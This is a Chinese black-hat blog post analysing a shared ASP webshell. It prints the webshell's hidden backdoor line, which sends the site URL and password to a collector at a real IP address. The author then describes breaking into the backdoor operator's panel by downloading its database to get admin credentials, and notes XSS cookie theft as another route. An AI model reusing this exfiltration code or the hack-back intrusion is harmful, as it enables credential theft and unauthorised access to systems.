黑吃黑:分析一款asp webshell后门箱子

2017年05月21日

在群内看到有人分享免杀木马。

第一眼感觉哪有这种好事,于是下载下来开始分析。

QQ截图20170521202646.png


用编辑器打开开始读代码。

我们可以看到第三行代码如下:

QQ截图20170521202746.png

代码为:

UserPass="admin123"  '密码

一般后门分好多种,直接跟随UserPass变量,直接爆菊。

QQ截图20170521203011.png

代码内容为:

j"<script src=""http://121.50.168.146:8080/api.asp?url="&server.URLEncode("""http://"&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script>"

后门地址为:

http://121.50.168.146:8080/

接收参数就是当前URL地址+密码,直接GET传输到api.asp

既然已经发现后门,直接爆菊!

QQ截图20170521203352.png

看到管理界面,就知道是网上公布了N多年的一套垃圾箱子程序。

low B!此版本存在各种XSS漏洞,随便插一下拿到cookie就可以进后台。但是我们不需要这么麻烦。

1.png

直接下载数据库,然后爆菊花,后台管理账户密码如下:

QQ截图20170521203742.png

webshell箱子数据如下:

QQ截图20170521203930.png


总结:

  1. 后门程序写的太烂,连个加密都没有。

  2. 箱子部署太糟糕,一点安全意识都没有。

  3. 百分百被爆菊


本文是黑帽博客原创文章!

文章转载请注明出处。违者必究。

黑帽博客(www.heimao.org)


分类:研究 | 标签: 后门asp木马爆菊webshell箱子 | 查看:852
在脚本中ASCII码的玩法镜像程序实现+原理

发表评论: